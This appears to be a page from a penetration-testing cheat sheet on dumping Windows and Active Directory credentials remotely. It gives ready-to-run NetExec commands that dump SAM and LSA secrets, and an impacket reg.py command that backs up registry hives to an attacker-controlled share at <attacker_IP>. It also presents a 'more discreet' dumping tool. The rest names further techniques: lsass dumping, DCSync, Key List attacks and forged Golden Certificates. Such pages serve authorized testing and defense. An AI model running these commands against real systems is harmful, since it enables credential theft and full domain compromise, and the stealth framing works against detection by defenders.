search
githubEdit

Various python tools to dump credentials remotely

hashtag
1) Check RunAsPPL

Check if RunAsPPL is enabled in the registry

nxc smb <target> -u user1 -p password -M runasppl

hashtag
2) Dump credentials remotely

Dump SAM database on a machine

nxc smb <target> -u user1 -p password --sam

Dump LSA secrets on a machine

nxc smb <target> -u user1 -p password --lsa

In a PDF with LSA_reg2pdf, exec get_pdf, and get_bootkey on your host to parse the PDF

.\get_pdf.exe 1
python3 get_bootkey.py

Dump through remote registry

reg.py -o \\<attacker_IP>\share domain.local/user1:password@<target> backup
reg.py domain.local/user1:password@<target> query -keyName 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon'

Dump with an alternative method, regsecrets.py, more discreet

regsecrets.py domain.local/user1:password@target.domain.local

Dump the lsass process and parse it

Retrieve Chrome passwords

Make a DCSync attack on all the users (NT hashes, Kerberos AES key, etc)

DCSync only the NT && LM hashes of a user

Retrieve NT hashes via Key List Attack on a RODC

Attempt to dump all the users' hashes even the ones in the Denied list

Low privileged credentials are needed in the command for the SAMR enumeration

Attempt to dump a specific user's hash

Certsync - retrieve the NT hashes of all the users with PKINIT

Backup the private key and the certificate of the Root CA, and forge Golden Certificates for all the users

Authenticate with all the certificate via PKINIT to obtain the TGTs and extract the hashes with UnPAC-The-Hash

Provide the CA .pfx if it has been obtained with another way

PreviousVarious python tools to dump credentials locallyNextGPPPassword and GPP Autologin

Last updated